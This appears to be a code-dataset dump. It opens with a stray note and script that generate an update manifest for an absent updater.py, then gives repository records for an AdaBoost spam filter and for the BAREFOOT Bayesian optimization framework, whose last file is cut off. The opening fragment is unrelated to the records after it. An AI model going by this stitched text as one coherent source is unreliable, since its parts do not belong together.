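updater.py expects the server's version.json to carry exactly four keys: md5_updater, link_updater, md5_binary and link_binary (these names are read directly in the script above). A sketch of generating that manifest on the server side, reusing the script's own md5 helper; the host URL mirrors the URL_UPDATE_VERSION constant and is a placeholder for wherever the files are actually hosted:

```python
# Build the version.json manifest that updater.py polls. The four keys are
# the ones the script reads; the URLs below are placeholders.
import json
import hashlib

def md5(filename):
    return hashlib.md5(open(filename, 'rb').read()).hexdigest()

manifest = {
    'md5_updater': md5('updater.py'),
    'link_updater': 'http://192.168.2.5:8080/updater.py',
    'md5_binary': md5('binary.hex'),
    'link_binary': 'http://192.168.2.5:8080/binary.hex',
}

with open('version.json', 'w') as fd:
    json.dump(manifest, fd)
```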
2
chrinide/ensemble-learner
https://github.com/chrinide/ensemble-learner
0084b5c80cd4d7499a63bebac438f6ceaafa07c4
5e7ad4c3183dca8e0346fb0fe18a972bd1ebc50e
9864ced99681c811e46fb9d358bd030ede01b862
refs/heads/master
2021-01-19T22:47:37.125382
2015-06-09T22:20:39
2015-06-09T22:20:39
37,962,248
1
0
null
2015-06-24T04:28:19
2015-06-24T04:28:18
2015-06-09T22:20:39
null
[ { "alpha_fraction": 0.667932391166687, "alphanum_fraction": 0.6800835132598877, "avg_line_length": 26.015384674072266, "blob_id": "096500fea782cc68473a285080c0b357437a9a70", "content_id": "d6ee897c17f191e6bf42a70b6138ecf5e1639f52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5267, "license_type": "no_license", "max_line_length": 110, "num_lines": 195, "path": "/boost.py", "repo_name": "chrinide/ensemble-learner", "src_encoding": "UTF-8", "text": "\"\"\"\nImplementation of a spam filter with boosting algorithms. \n\"\"\"\nimport numpy as np\n\ndef weight_error(true_labels, pred_labels, weights):\n\t'''\n\tReturns weighted error, considers weight vector in calculation. \n\t'''\t\n\tn = true_labels.size\n\terror = 0.0 \n\tfor i in xrange(n):\n\t\tif true_labels[i] != pred_labels[i]:\n\t\t\terror += weights[i]\n\treturn error\n\ndef weak_clf_plus(data,word_index):\n\t'''\n\tReturns vector containing predicted labels of the data.\n\tClassifier predicts 1 if word i appears in data point x, otherwise -1.\n\t'''\n\tpredictions = []\n\tn_sample, n_feat = data.shape\n\tfor i in xrange(n_sample): \n\t\tif data[i][word_index] == 1:\n\t\t\tpredictions.append(1)\n\t\telse:\n\t\t\tpredictions.append(-1)\n\treturn np.array(predictions)\n\ndef weak_clf_minus(data,word_index):\n\t'''\n\tReturns vector containing predicted labels of the data.\n\tClassifier predicts 1 if word i does not appear in data point x, otherwise -1. \n\t'''\n\tpredictions = []\n\tn_sample, n_feat = data.shape\n\tfor i in xrange(n_sample): \n\t\tif data[i][word_index] == 0:\n\t\t\tpredictions.append(1)\n\t\telse:\n\t\t\tpredictions.append(-1)\n\treturn np.array(predictions)\n\ndef weak_clf_xi_plus(x_i, word_index):\n\t'''\n\tReturns single prediction. \n\t'''\n\tif x_i[word_index] == 1:\n\t\treturn 1\n\telse: \n\t\treturn -1\n\ndef weak_clf_xi_minus(x_i, word_index):\n\t'''\n\tReturns single prediction\n\t'''\n\tif x_i[word_index] == 0:\n\t\treturn 1\n\telse: \n\t\treturn -1\n\ndef final_weak_learner(clf_idx, x_i):\n\t'''\n\tReturns single prediction, 1 or -1, for point x_i \n\t'''\n\tif clf_idx > 1530: \n\t\treturn weak_clf_xi_minus(x_i, (clf_idx-1531))\n\telse:\n\t\treturn weak_clf_xi_plus(x_i,clf_idx)\n\ndef boost_algorithm(train_data,labels, vocab, n_rounds):\n\t'''\n\tReturns the vector of classifier weights (a_t) and the vector of chosen\n\tweak classifier indices from the n_rounds boosting rounds. 
\n\t'''\n\t\n\t# Instantiate vector containing weight distribution\n\tn = labels.size\n\tvocab_size = vocab.size\n\tweight_vec = np.array([1.0/n]*n)\n\ta_vec = []\n\tclf_indx_vec = []\n\n\tprint \"Number of boosting rounds: %s \" % n_rounds\n\tfor t in xrange(n_rounds):\n\t\t#print \"round %s:\" % (t+1)\n\t\terror_vec = [] \n\n\t\t# get weighted error for all weak clfs\n\t\tfor i in xrange(vocab_size):\n\t\t\terror_vec.append(weight_error(labels, weak_clf_plus(train_data,i),weight_vec))\n\t\tfor j in xrange(vocab_size):\n\t\t\terror_vec.append(weight_error(labels, weak_clf_minus(train_data,j),weight_vec))\n\t\t\n\t\t# pick weak learner\n\t\terror_vec = np.array(error_vec)\n\t\terr = np.amin(error_vec)\n\t\t#print \"error:%s\" %err\n\t\tclf_indx = np.argmin(error_vec)\n\t\t#print \"clfidx: %s\" % clf_indx\n\t\ta_t = 0.5 * np.log((1.0-err)/err) \n\t\t\n\t\t# store for final clf \n\t\tclf_indx_vec.append(clf_indx)\n\t\ta_vec.append(a_t)\n\t\t\n\t\t# reset weight vector\n\t\tfor z in xrange(n):\n\t\t\tweight_vec[z] = weight_vec[z] * np.exp(-1.0 * a_t * labels[z] * final_weak_learner(clf_indx,train_data[z]))\n\t\tweight_vec = weight_vec / np.sum(weight_vec)\n\t\t\n\treturn np.array(a_vec), np.array(clf_indx_vec)\n\n\ndef boost_clf(data, a_vec, clf_indx_vec):\n\t'''\n\tReturn final prediction by calculating weighted majority of classifiers\n\tin all rounds of boosting. \n\t'''\n\tT = a_vec.size\n\tfinal_pred = [] \n\n\tfor x in data:\n\t\tfinal_sum = 0\n\t\tfor t in xrange(T):\n\t\t\tfinal_sum += a_vec[t] * final_weak_learner(clf_indx_vec[t], x)\n\t\tif np.sign(final_sum) == 1:\n\t\t\tfinal_pred.append(1)\n\t\telse: \n\t\t\tfinal_pred.append(-1)\n\treturn np.array(final_pred)\n\ndef get_words(clf_indexes,word_dict):\n\t'''\n\tReturns string of words representing weak classifiers chosen\n\t'''\n\twords = []\n\tn = clf_indexes.size\n\tfor i in xrange(n):\n\t\tif clf_indexes[i] > 1530:\n\t\t\twords.append(word_dict[clf_indexes[i]-1531])\n\t\telse: \n\t\t\twords.append(word_dict[clf_indexes[i]])\n\treturn np.array(words,dtype='string')\n\ndef calc_error(true_labels, pred_labels):\n\t'''\n\tReturns percent error of predicted labels\n\t'''\n\tassert true_labels.size == pred_labels.size\n\tn = true_labels.size\n\n\t# Calculate the error\n\tmis_count = 0.0\n\tfor i in xrange(n):\n\t\tif pred_labels[i] != true_labels[i]:\n\t\t\tmis_count += 1.0\n\treturn (mis_count/n)\n\ndef main():\n\t'''\n\tRuns boosting algorithm on the dataset with designated number of rounds\n\t'''\n\t# Parse input\n\ttrain = np.genfromtxt('data/train_data.txt')\n\ttest = np.genfromtxt('data/test_data.txt')\n\tword_dict = np.genfromtxt('dictionary.txt',dtype = 'string')\n\n\t# Separate data from labels\n\tn_feat = word_dict.size\n\ttrain_data = train[:,:-1]\n\ttrain_labels = train[:,n_feat]\n\ttest_data = test[:,:-1]\n\ttest_labels = test[:,n_feat]\n\n\t# Fit classifier, specify number of rounds of boosting\n\ta_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,10)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,2)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,3)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,7)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,15)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,20)\n\t\n\t# Run classification, print error\n\ttrain_err = calc_error(train_labels, boost_clf(train_data, a_vec, clf_indexes))\n\ttest_err = calc_error(test_labels, 
boost_clf(test_data, a_vec, clf_indexes))\n\n\tprint \"Train Error: \", train_err\n\tprint \"Test Error: \", test_err\n\tprint \"Buzzwords: \"\n\tprint get_words(clf_indexes,word_dict)\n\nif __name__ == '__main__':\n\tmain()" }, { "alpha_fraction": 0.7967032790184021, "alphanum_fraction": 0.7967032790184021, "avg_line_length": 29.33333396911621, "blob_id": "b2bbeeece6f22ba59db33dc98f9159f9cffe78b0", "content_id": "7e2436de05c1da82585c4e1a801dc243fbeb868d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 136, "num_lines": 6, "path": "/README.md", "repo_name": "chrinide/ensemble-learner", "src_encoding": "UTF-8", "text": "# ensemble-learner\n\nImplements a spam filter using ensemble learning. The training and test errors for the specified number of boosting rounds are printed. \n\nUSAGE: \npython boost.py\n" } ]
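For intuition on the update rule inside boost_algorithm above: with weighted error err, the round weight is a_t = 0.5 * ln((1 - err) / err), and each sample weight is scaled by exp(-a_t * y_i * h(x_i)) before renormalizing. A tiny worked example with made-up numbers:

```python
# Worked example of one AdaBoost round as implemented in boost_algorithm.
import numpy as np

err = 0.2                              # made-up weighted error of the chosen weak learner
a_t = 0.5 * np.log((1.0 - err) / err)  # ~0.693, the classifier's vote weight

weights = np.array([0.25, 0.25, 0.25, 0.25])
labels  = np.array([1, -1, 1, -1])
preds   = np.array([1, -1, -1, -1])    # third point misclassified

weights = weights * np.exp(-a_t * labels * preds)
weights = weights / np.sum(weights)
print(weights)  # [0.143 0.143 0.571 0.143]: the misclassified point now dominates
```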
2
jtao/BAREFOOT-Framework
https://github.com/jtao/BAREFOOT-Framework
be9bcfa6c2821154028a1469cb425c2eabb63fd1
93412086a65119c54a2847f5fe2f6a2d00e6cf66
9f3a9570d03a16a89b046a00971e243569494b52
refs/heads/master
2023-03-29T20:07:31.420036
2021-03-29T18:35:49
2021-03-29T18:35:49
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6088184118270874, "alphanum_fraction": 0.6153345108032227, "avg_line_length": 40.8636360168457, "blob_id": "8b46217e1cfb18f92cda0961a53f3f53efa2ef46", "content_id": "6f43051dcf550e9541d9472aca13634c40b5c52c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4604, "license_type": "no_license", "max_line_length": 112, "num_lines": 110, "path": "/gpModel.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 12:43:08 2020\n\n@author: richardcouperthwaite\n\"\"\"\n\nfrom george import kernels, GP\nimport numpy as np\nfrom copy import deepcopy\n\nclass gp_model:\n \"\"\"\n A class that creates a GP from a given set of input data and hyper-parameters.\n The Kernel can be selected from three separate Kernels.\n \"\"\"\n def __init__(self, x_train, y_train, l_param, sigma_f, sigma_n, n_dim, kern, mean=0):\n self.x_train = np.array(x_train)\n self.y_train = np.array(y_train)\n self.l_param = np.array(l_param)**2\n self.sigma_f = sigma_f\n self.sigma_n = sigma_n\n self.mean = mean\n self.n_dim = n_dim\n self.kern = kern\n self.kk = self.create_kernel()\n self.gp = self.create_gp()\n \n def create_kernel(self):\n # This function creates the covariance function kernel for the Gaussian Process\n if self.kern == 'SE':\n return self.sigma_f * kernels.ExpSquaredKernel(self.l_param, ndim=self.n_dim)\n elif self.kern == 'M32':\n return self.sigma_f * kernels.Matern32Kernel(self.l_param, ndim=self.n_dim)\n elif self.kern == 'M52':\n return self.sigma_f * kernels.Matern52Kernel(self.l_param, ndim=self.n_dim)\n \n def create_gp(self):\n # This function uses the kernel defined above to compute and train the Gaussian Process model\n gp = GP(kernel=self.kk, mean=self.mean)\n gp.compute(self.x_train, self.sigma_n)\n return gp\n \n def predict_cov(self, x_pred):\n # This function is used to predict the mean and the full covariance \n # matrix for the test points (x_pred)\n mean, sigma = self.gp.predict(self.y_train, x_pred, kernel = self.kk, return_cov=True, return_var=False)\n return mean, sigma\n \n def predict_var(self, x_pred):\n # This function is used to predict the mean and the variance (the diagonal of \n # the full covariance matrix) for the test points (x_pred)\n mean, var = self.gp.predict(self.y_train, x_pred, kernel = self.kk, return_cov=False, return_var=True)\n return mean, var\n \n def update(self, new_x_data, new_y_data, new_y_err, err_per_point):\n # This function is used to update and retrain the GP model when new\n # training data is available\n self.x_train = np.vstack((self.x_train, new_x_data))\n self.y_train = np.append(self.y_train, new_y_data)\n if err_per_point:\n self.sigma_n = np.append(self.sigma_n, new_y_err)\n \n self.gp = self.create_gp()\n \n def sample_posterior(self, x_test):\n # This function provides a random sampling from the Gaussian Process\n # posterior distribution\n return self.gp.sample_conditional(self.y_train, x_test, size=1)\n \n def log_likelihood(self):\n # This function computes the log likelihood of the training data given\n # the hyperparameters\n return self.gp.log_likelihood(self.y_train, quiet=True)\n \n def get_hyper_params(self):\n # This function obtains the hyperparameters from the trained GP and\n # modifies them to be consistent with other Gaussian Process implementations\n curr_params = self.gp.get_parameter_vector()\n params = []\n for i in range(len(curr_params)):\n if i == 0:\n 
params.append(np.exp(curr_params[i])*self.n_dim)\n            else:\n                params.append(np.sqrt(np.exp(curr_params[i])))\n        return np.array(params)\n    \n    def hp_optimize(self, meth=\"L-BFGS-B\", update=False):\n        # This function can be used to optimize the GP hyperparameters\n        import scipy.optimize as op\n        gp = deepcopy(self)\n        p0 = gp.gp.get_parameter_vector()\n        def nll(p):\n            gp.gp.set_parameter_vector(p)\n            ll = gp.log_likelihood()\n            return -ll if np.isfinite(ll) else 1e25\n        \n        def grad_nll(p):\n            gp.gp.set_parameter_vector(p)\n            return -gp.gp.grad_log_likelihood(self.y_train, quiet=True)\n        \n        results = op.minimize(nll, p0, jac=grad_nll, method=meth)\n        if update:\n            # automatically update the hyper-parameters; the required input for\n            # the set_parameter_vector command is the log of the hyper-parameters\n            self.gp.set_parameter_vector(results.x)\n            self.gp.compute(self.x_train, self.sigma_n)\n        # The results are the log of the hyper-parameters, so return the\n        # exponential of the results.\n        return np.exp(results.x)
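\n\n# Minimal usage sketch (hypothetical data, not part of the framework's tests):\n# fit a 1D GP with the 'SE' kernel on three points, then optimize its\n# hyperparameters in place.\n#   gp = gp_model(np.array([[0.1], [0.5], [0.9]]), np.array([0.2, 0.8, 0.3]),\n#                 [0.1], 1.0, 0.01, 1, 'SE')\n#   optimized_hps = gp.hp_optimize(update=True)" }, { "alpha_fraction": 0.7012426257133484, "alphanum_fraction": 0.7177240252494812, "avg_line_length": 61.69166564941406, "blob_id": "bb4305cca235e4819de49044ce0fff71a8685d8d", "content_id": "cfbb8c9e38e295a3d3bbe743bdd7c2919d1541f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7649, "license_type": "no_license", "max_line_length": 399, "num_lines": 120, "path": "/readme.md", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# Batch Reification/Fusion Optimization (BAREFOOT) Framework\r\n\r\n![Image of BAREFOOT](https://github.com/RichardCouperthwaite/BAREFOOT-Framework/blob/master/BAREFOOT.png)\r\n\r\nThe BAREFOOT Framework class structure allows for two different calculation setups:\r\n\r\n### Single-Node\r\nThis version of the code will run on a single compute node. This compute node could be a single local PC, or a single node on a High Performance Computing Cluster.\r\n\r\n### Multi-Node\r\nThis version of the code is designed to utilize multiple nodes in a High Performance Computing Cluster. The aim is to reduce the time required for the computations. The number of nodes used in this approach is specified by the user and the total number of calculations is split evenly between these nodes.\r\n\r\n\r\n\r\n## Framework Initialization \r\nThe framework is initialized in a two stage process. The first sets up the framework with general information. The parameters that can be edited are:\r\n\r\n* ROMModelList : This is the list of functions that are the cheap information sources. These need to be in a form that ensures that by providing the unit hypercube input, the function will provide the required output\r\n* TruthModel : This is the Truth model, or the function that needs to be optimized.\r\n* calcInitData : This variable controls whether the initial data is calculated for each of the models or is retrieved from a file\r\n* initDataPathorNum : This variable holds the number of initial datapoints to evaluate for each information source (including the Truth Model), or, when initial data is loaded from a file, holds the path to the initial data file\r\n* multiNode : This variable reflects the number of subprocesses that will be used for the calculations. A value of zero indicates all calculations will be completed on the main compute node.\r\n* workingDir : This is the path to the working directory. 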
In some cases it may be desirable to store data separately from the code; this will allow the data to be stored in alternate locations. Can also be used if the relative directory reference is not working correctly.\r\n* calculationName : This is the name for the calculation and will change the results directory name\r\n* nDim : The number of dimensions for the input space that will be used\r\n* restore_calc : This parameter toggles whether the framework data is set up from the information provided or retrieved from a save_state file. This can be used to restart a calculation\r\n* updateROMafterTM : This parameter allows the reduced order models to be retrained after getting more data from the Truth Model. The model function calls do not change, so the training needs to reflect in the same function.\r\n* externalTM : In cases where it is necessary to evaluate the Truth Model separately from the framework (for example, if the Truth Model is an actual experiment), this toggles the output of the predicted points to a separate file for use externally. The framework is shut down after the data is output; see the test examples for how to restart the framework after the external Truth Model has been evaluated\r\n* acquisitionFunc : The acquisition function to use to evaluate the next best points for the reduced order models. Currently the options are \"KG\" for Knowledge Gradient and \"EI\" for expected improvement.\r\n* A, b, Aeq, beq: Equality and inequality constraints according to the following equations:\r\n    * A*x <= b\r\n    * Aeq*x == beq\r\n* ub, lb : Upper bounds and lower bounds for inputs, all inputs must receive a value (Specify 0 for lb and 1 for ub if there is no bound for that input)\r\n* func : function constraints, must take the input matrix (x) and output a vector of length equal to the number of samples in the input matrix (x) with boolean values.\r\n* keepSubRunning : Determines whether the subprocesses are left running while calling the Truth Model\r\n* verbose : Determines the logging level for tracking the calculations.\r\n\r\nThe second stage sets up the specific calculation required:\r\n\r\n* modelParam : This is a dictionary of hyperparameters for the low-order model GPs and the discrepancy GPs. See example below for dictionary structure.\r\n* covFunc : Choice of covariance function for building GP models. Choices are currently limited to Squared Exponential (\"SE\"), Matern 3/2 (\"M32\"), and Matern 5/2 (\"M52\").\r\n* iterLimit : This determines the total number of iterations that the calculation will run for.\r\n* sampleCount : The number of test samples to use. Samples are selected by Latin Hypercube Sampling.\r\n* hpCount : The number of hyperparameter sets to use.\r\n* batchSize : The batch size for the evaluations of the real functions. This affects both the number of reduced order evaluations and the number of Truth Function evaluations.\r\n* tmIter : The iteration limit before calling the Truth Function.\r\n* totalBudget : The total budget (calculation time) that can be expended before the framework is terminated.\r\n* tmBudget : The amount of budget that needs to be used before the Truth Function is evaluated.\r\n* upperBound : The upper bound of the hyperparameters (usually setting to 1 is sufficient since inputs are on a unit hypercube).\r\n* lowBound : The lower bound of the hyperparameter values.\r\n* fusedPoints : The number of points per dimension to use when constructing the Fused GP. 
Points for evaluating the Fused GP are sampled linearly for each dimension, creating a grid of points to evaluate the fused mean and variance.\r\n\r\nThe code below is included in the \"barefoot.py\" file as a test, and provides the minimum input required for running the BAREFOOT Framework.\r\n\r\n```\r\nimport matplotlib.pyplot as plt\r\nfrom barefoot import barefoot\r\nfrom pickle import load\r\nimport numpy as np\r\n\r\ndef rom1(x):\r\n    x = x*(2)+0.5\r\n    return -np.sin(9.5*np.pi*x) / (2*x)\r\n\r\ndef rom2(x):\r\n    x = x*(2)+0.5\r\n    return -(x-1)**4\r\n\r\ndef tm(x):\r\n    x = x*(2)+0.5\r\n    # Gramacy & Lee Test Function\r\n    return -(x-1)**4 - np.sin(10*np.pi*x) / (2*x)\r\n\r\ndef plot_results(calcName):\r\n    x = np.linspace(0,1,1000)\r\n\r\n    y1 = tm(x)\r\n    y2 = rom1(x)\r\n    y3 = rom2(x)\r\n    \r\n    plt.figure()\r\n    plt.plot(x,y1,label=\"TM\")\r\n    plt.plot(x,y2,label=\"ROM1\")\r\n    plt.plot(x,y3,label=\"ROM2\")\r\n    plt.legend()\r\n\r\n    with open('./results/{}/iterationData'.format(calcName), 'rb') as f:\r\n        iterationData = load(f)\r\n    \r\n    plt.figure()\r\n    plt.plot(iterationData.loc[:,\"Iteration\"], iterationData.loc[:,\"Max Found\"])\r\n\r\ndef singleNodeTest():\r\n    np.random.seed(100)\r\n    ROMList = [rom1, rom2]\r\n    test = barefoot(ROMModelList=ROMList, TruthModel=tm, \r\n                    calcInitData=True, initDataPathorNum=[1,1,1,1], nDim=1, \r\n                    calculationName=\"SingleNodeTest\", acquisitionFunc=\"EI\")\r\n    modelParam = {'model_l':[[0.1],[0.1]], \r\n                  'model_sf':[1,1,1], \r\n                  'model_sn':[0.01,0.01], \r\n                  'means':[0,0], \r\n                  'std':[1,1], \r\n                  'err_l':[[0.1],[0.1]], \r\n                  'err_sf':[1,1,1], \r\n                  'err_sn':[0.01,0.01],\r\n                  'costs':[1,2,20]}\r\n    test.initialize_parameters(modelParam=modelParam, iterLimit=30, \r\n                               sampleCount=10, hpCount=50, \r\n                               batchSize=2, tmIter=5)\r\n    test.run_optimization()\r\n    \r\n    plot_results(\"SingleNodeTest\")\r\n\r\nif __name__ == \"__main__\":\r\n    singleNodeTest()\r\n```\r\n
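\r\nRunning the same problem in multi-node mode only changes how the barefoot object is constructed. The sketch below is a hypothetical illustration based on the multiNode parameter described above (the function name multiNodeTest and the choice of four subprocesses are illustrative, not part of the framework's tests); it assumes an HPC environment in which the framework can launch the requested subprocesses.\r\n\r\n```\r\ndef multiNodeTest():\r\n    # identical to singleNodeTest() above, except that four subprocess\r\n    # nodes are requested through the multiNode argument;\r\n    # initialize_parameters and run_optimization are then called\r\n    # exactly as in singleNodeTest()\r\n    ROMList = [rom1, rom2]\r\n    test = barefoot(ROMModelList=ROMList, TruthModel=tm,\r\n                    calcInitData=True, initDataPathorNum=[1,1,1,1], nDim=1,\r\n                    calculationName=\"MultiNodeTest\", acquisitionFunc=\"EI\",\r\n                    multiNode=4)\r\n```\r\n\r\nFor more information on the methods used in this framework, please see our publications:\r\n\r\n1. Couperthwaite, Richard, Abhilash Molkeri, Danial Khatamsaz, Ankit Srivastava, Douglas Allaire, and Raymundo Arroyave. “Materials Design Through Batch Bayesian Optimization with Multisource Information Fusion.” JOM, October 13, 2020. https://doi.org/10.1007/s11837-020-04396-x.\r\n\r\n" }, { "alpha_fraction": 0.5865907669067383, "alphanum_fraction": 0.6030360460281372, "avg_line_length": 31.26938819885254, "blob_id": "e3e4130d19f69a2e2628145d0e271aacd6442486", "content_id": "36ede333f57e9a1b6b959c59817b09f713513337", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7923, "license_type": "no_license", "max_line_length": 99, "num_lines": 245, "path": "/acquisitionFunc.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 13:51:02 2020\n\n@author: richardcouperthwaite\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import norm\nfrom scipy import random\n\ndef knowledge_gradient(M, sn, mu, sigma):\n    \"\"\"\n    This is the method used to determine the knowledge gradient of the fused model\n    for a given set of test data points. The aim is to calculate the best possible\n    point to be used in the next iteration. This function will be called after the\n    fused model is calculated for each of the lower order models being assumed to\n    be the truth model.\n    \n    Implementation based on the work by Frazier, Powell, Dayanik\n    [1]P. Frazier, W. Powell, and S. 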
Dayanik, “The Knowledge-Gradient Policy for \n    Correlated Normal Beliefs,” INFORMS Journal on Computing, vol. 21, no. 4, pp. \n    599–613, May 2009.\n    \n    M: the number of samples\n    sn: the noise of the model\n    mu: mean of the model for all M samples\n    sigma: covariance matrix of the model\n    \n    The function returns:\n    NU: Knowledge Gradient values for all the samples\n    nu_star: the maximum knowledge gradient value\n    x_star: the index of the value with the maximum knowledge gradient (0 as first index)\n    \"\"\"\n    from scipy.stats import norm\n    \n    def algorithm1(a, b, M):\n        c = [np.inf]\n        A = [0]\n        for i in range(M-1):\n            c.append(np.inf)\n            t = 0\n            while t == 0:\n                j = A[-1]\n                c[j] = (a[j]-a[i+1])/(b[i+1]-b[j])\n                if (len(A)!=1) and (c[j]<=c[A[-2]]):\n                    A = A[0:-1]\n                else:\n                    t = 1\n                    A.append(i+1)\n        c = np.array(c)\n        A = np.array(A)\n        return c, A\n    \n    NU = []\n    \n    for i in range(M):\n        a = mu\n        try:\n            b = sigma[:,i]/np.sqrt(sn**2+sigma[i,i])\n        except IndexError:\n            b = sigma/np.sqrt(sn**2+sigma[i])\n        \n        I = np.argsort(b)\n        a = a[I]\n        b = b[I]\n        bb, indexes, inverse = np.unique(b, return_index=True, return_inverse=True)\n        aa = []\n        for ii in range(len(indexes)):\n            aa.append(np.max(a[np.where(b == b[indexes[ii]])]))\n        \n        MM = len(aa)\n        aa = np.array(aa)\n        c, A = algorithm1(aa, bb, MM)\n        aa = aa[A]\n        bb = bb[A]\n        c = c[A]\n        MM = A.shape[0]\n        sig = 0\n        for ii in range(MM-1):\n            sig += (bb[ii+1]-bb[ii])*(norm.pdf(-abs(c[ii]))+ (-abs(c[ii])) * norm.cdf(-abs(c[ii])))\n        nu = np.log(sig)\n        NU.append(nu)\n        \n        try:\n            if nu>nu_star:\n                nu_star = nu\n                x_star = i\n        except NameError:\n            nu_star = nu\n            x_star = i\n    \n    return nu_star, x_star, NU\n\ndef expected_improvement(curr_max, xi, y, std):\n    \"\"\"\n    This function calculates the maximum expected improvement for a selection of\n    test points from the surrogate model of an objective function with a mean and variance.\n    \n    J. Mockus, V. Tiesis, and A. Zilinskas. Toward Global Optimization, volume 2,\n    chapter The Application of Bayesian Methods for Seeking the Extremum, pages\n    117–128. Elsevier, 1978.\n    \n    Parameters\n    ----------\n    curr_max : float\n        This value is the best value of the objective function that has been obtained.\n    xi : float\n        This parameter defines how much the algorithm exploits, or explores.\n    y : 1D vector Numpy Array\n        The mean of the surrogate model at all test points used in the optimization.\n    std : 1D vector Numpy Array\n        The standard deviation from the surrogate model at all test points \n        used in the optimization.\n\n    Returns\n    -------\n    max_val : float\n        The maximum expected improvement value.\n    x_star : integer\n        The index of the test point with the maximum expected improvement value.\n    EI : 1D vector Numpy Array\n        Expected improvement values for all test points.\n\n    \"\"\"\n    \n    # Standard EI form (Mockus): with z = (y - curr_max - xi)/std,\n    # EI = (y - curr_max - xi)*CDF(z) + std*PDF(z)\n    z = (y-curr_max-xi)/std\n    pdf = norm.pdf(z)\n    cdf = norm.cdf(z)\n\n    EI = (y-curr_max-xi)*cdf + std*pdf\n    \n    max_val = np.max(EI)\n    x_star = np.where(EI == max_val)[0]\n    \n    return max_val, x_star[0], EI\n\n
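# Minimal usage sketch for the acquisition functions in this module\n# (hypothetical values, not framework output): pick the next of three\n# candidate points given a current best observation of 0.7.\n#   mu = np.array([0.5, 0.8, 0.6])\n#   sd = np.array([0.1, 0.2, 0.1])\n#   best_ei, idx, all_ei = expected_improvement(0.7, 0.01, mu, sd)\n\ndef probability_improvement(curr_max, xi, y, std):\n    \"\"\"\n    This function calculates the maximum probability improvement for a selection of\n    test points from the surrogate model of an objective function with a mean and variance.\n    \n    Kushner, H. J. “A New Method of Locating the Maximum Point of an Arbitrary \n    Multipeak Curve in the Presence of Noise.” Journal of Basic Engineering 86, \n    no. 1 (March 1, 1964): 97–106. 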
https://doi.org/10.1115/1.3653121.\n    \n    Parameters\n    ----------\n    curr_max : float\n        This value is the best value of the objective function that has been obtained.\n    xi : float\n        This parameter defines how much the algorithm exploits, or explores.\n    y : 1D vector Numpy Array\n        The mean of the surrogate model at all test points used in the optimization.\n    std : 1D vector Numpy Array\n        The standard deviation from the surrogate model at all test points \n        used in the optimization.\n\n    Returns\n    -------\n    max_val : float\n        The maximum probability of improvement value.\n    x_star : integer\n        The index of the test point with the maximum probability of improvement value.\n    PI : 1D vector Numpy Array\n        Probability of improvement values for all test points.\n\n    \"\"\"\n    \n    PI = norm.cdf((y-curr_max-xi)/std)\n    max_val = np.max(PI)\n    x_star = np.where(PI == max_val)[0]\n    \n    return max_val, x_star[0], PI\n\ndef upper_conf_bound(kt, y, std):\n    \"\"\"\n    This function calculates the Upper Confidence Bound for a selection of\n    test points from the surrogate model of an objective function with a mean and variance.\n    \n    D. D. Cox and S. John. SDO: A statistical method for global optimization. In\n    M. N. Alexandrov and M. Y. Hussaini, editors, Multidisciplinary Design Optimization:\n    State of the Art, pages 315–329. SIAM, 1997.\n    \n    Parameters\n    ----------\n    kt : float\n        This parameter is a combined parameter for the sqrt(beta*nu).\n    y : 1D vector Numpy Array\n        The mean of the surrogate model at all test points used in the optimization.\n    std : 1D vector Numpy Array\n        The standard deviation from the surrogate model at all test points \n        used in the optimization.\n\n    Returns\n    -------\n    max_val : float\n        The maximum upper confidence bound value.\n    x_star : integer\n        The index of the test point with the maximum upper confidence bound value.\n    UCB : 1D vector Numpy Array\n        Upper confidence bound values for all test points.\n\n    \"\"\"\n    \n    UCB = y+kt*std\n    max_val = np.max(UCB)\n    x_star = np.where(UCB == max_val)[0]\n    \n    return max_val, x_star[0], UCB\n\ndef thompson_sampling(y, std):\n    \"\"\"\n    Thompson sampling was first described by Thompson in 1933 as a solution to\n    the multi-arm bandit problem.\n    \n    Thompson, W. 1933. “On the likelihood that one unknown probability\n    exceeds another in view of the evidence of two samples”. 
Biometrika.\n    25(3/4): 285–294.\n\n    Parameters\n    ----------\n    y : 1D vector Numpy Array\n        The mean of the surrogate model at all test points used in the optimization.\n    std : 1D vector Numpy Array\n        The standard deviation from the surrogate model at all test points \n        used in the optimization.\n\n    Returns\n    -------\n    nu_star : float\n        The maximum value from the Thompson Sampling.\n    x_star : integer\n        The index of the test point with the maximum value.\n    tsVal : 1D vector Numpy Array\n        Sampled values for all test points.\n    \"\"\"\n    \n    tsVal = random.normal(loc=y, scale=std)\n    nu_star = np.max(tsVal)\n    \n    x_star = int(np.where(tsVal == nu_star)[0])\n    \n    return nu_star, x_star, tsVal" }, { "alpha_fraction": 0.5051613450050354, "alphanum_fraction": 0.5167880058288574, "avg_line_length": 51.59428405761719, "blob_id": "616bfc79bf210f4fada8d95be5a973ab3204db07", "content_id": "43141d8ae5e900f91883c909312244cf8254c352", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9203, "license_type": "no_license", "max_line_length": 132, "num_lines": 175, "path": "/subProcess.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 3 06:17:35 2021\n\n@author: Richard 